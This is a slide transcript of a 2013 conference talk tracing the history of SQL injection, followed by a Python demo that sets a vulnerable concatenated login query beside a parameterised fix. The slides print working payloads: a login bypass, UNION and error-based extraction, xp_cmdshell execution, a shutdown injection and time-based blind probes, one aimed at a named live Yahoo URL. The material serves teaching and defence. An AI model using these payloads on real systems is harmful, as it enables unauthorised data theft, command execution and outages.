Codemotion 2013: Happy 15th anniversary, SQL Injection

Talk by Chema Alonso on the history and evolution of SQL Injection techniques at the Codemotion ES 2013 event, held at the Escuela Universitaria de Informática of the Universidad Politécnica de Madrid.
Transcript

  • 1. Happy 15th anniversary, SQL Injection
  • 2. Los Amantes del Círculo Polar
  • 3. 25 – Dec – 1998: The birth http://www.phrack.org/issues.html?id=8&issue=54
  • 4. ' or '1'='1
       admin' or '1'='1
       q="Select uid from users where uid='"+$user+"' and pass='"+pass+"';"
       q="Select uid from users where uid='admin' and pass='' or '1'='1';"
  • 5. 14 – Aug – 2007: IBM http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
  • 6. Inband -1' union select 1,1,1,1,username,1,'a',1 from users --
  • 7. 2001 - OutBand http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
  • 8. Yesterday - [Microsoft][ODBC SQL Server Driver] [SQL Server]Incorrect syntax near the keyword 'or'.
       q="Select title from noticias where ud="+$id+";"
       Id=1 or 1=(select top 1 username from sysusers)
  • 9. Jul – 2007: Microsoft Partner Programme
  • 10. 2002 – Advanced SQL Injection Techniques https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
  • 11. Advanced Tricks
       Username: '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end--
       Username: ' union select ret,1,1,1 from foo--
       Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int.
       exec master..xp_cmdshell 'dir'
       Id= 1; shutdown --
  • 12. 27 – Mar - 2007
  • 13. Outer Bands: DNS Queries, FTP Sites, SMB Files, Remote DB, Web Files, Log Files
  • 14. 2002 - Blind
       http://server/miphp.php?id=1 and 1=1 (True)
       http://server/miphp.php?id=1 and 1=0 (False)
  • 15. 2010 – US Army
  • 16. 2010 – US Army
  • 17. 2002 – Time Based Blind SQL Injection http://www.northernfortress.net/more_advanced_sql_injection.pdf
  • 18. (more) Advanced Tricks
       ping -n 10 127.0.0.1
       if (ascii(substring(@s, @byte, 1)) & (power(2, @bit))) > 0 waitfor delay '0:0:5'
  • 19. 2004 – Time-Based in Other Databases
       SQL Server: 1) ; if … waitfor delay  2) ; exec xp_cmdshell (ping -n)
       Oracle: 1) dbms_lock.sleep() (PL/SQL Injection)
       MySQL: 1) and sleep() (5.0 or higher)  2) Benchmark functions
       Postgres: 1) pg_sleep()
  • 20. Jun – 2007 : Solar Empire Exploit http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
  • 21. Apr – 2013: Yahoo! http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)-- http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
  • 22. 2007 – Time-Based SQL Injection using Heavy Queries https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
  • 23. Time-Based Using Heavy Queries in MS Access True False
  • 24. Deep Blind SQL Injection http://labs.portcullis.co.uk/application/deep-blind-sql-injection
  • 25. Serialized SQL Injection
  • 26. Arithmetic Blind SQL Injection
  • 27. RFD
  • 28. Connection String Parameter Pollution
  • 29. Xpath Injection
  • 30. LDAP Injection
  • 31. OWASP TOP 10 - 2013
  • 32. Forbidden
  • 33. Fixing Code Injections isn't the worst job
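The 1998 login bypass from slide 4, reproduced as an added example (not code from the talk) in Python against an in-memory SQLite table: the string-concatenated query that the payload subverts sits beside the parameterised query that defeats it. The table contents are constructed sample data.

```python
import sqlite3

# Constructed sample data (not from the talk): a tiny users table.
SAMPLE_USERS = [("admin", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Return an in-memory SQLite database seeded with SAMPLE_USERS."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (uid TEXT, pass TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    con.commit()
    return con


def login_concat(con, user, password):
    """Vulnerable form: the query is built by string concatenation, as on
    slide 4, so whatever the caller sends becomes part of the SQL text."""
    q = ("SELECT uid FROM users WHERE uid='" + user
         + "' AND pass='" + password + "'")
    row = con.execute(q).fetchone()
    return row[0] if row else None


def login_param(con, user, password):
    """Hardened form: placeholders keep data and code apart. The driver
    passes the values separately and they are never parsed as SQL, so the
    same payload is simply a password that matches no row."""
    q = "SELECT uid FROM users WHERE uid=? AND pass=?"
    row = con.execute(q, (user, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    con = make_db()
    bypass = "' or '1'='1"  # the payload shown on slide 4
    # With concatenation the WHERE clause becomes
    #   uid='admin' AND pass='' or '1'='1'   -> true for every row
    print("concat, real password :", login_concat(con, "admin", "s3cret"))
    print("concat, bypass payload:", login_concat(con, "admin", bypass))
    print("param,  bypass payload:", login_param(con, "admin", bypass))
```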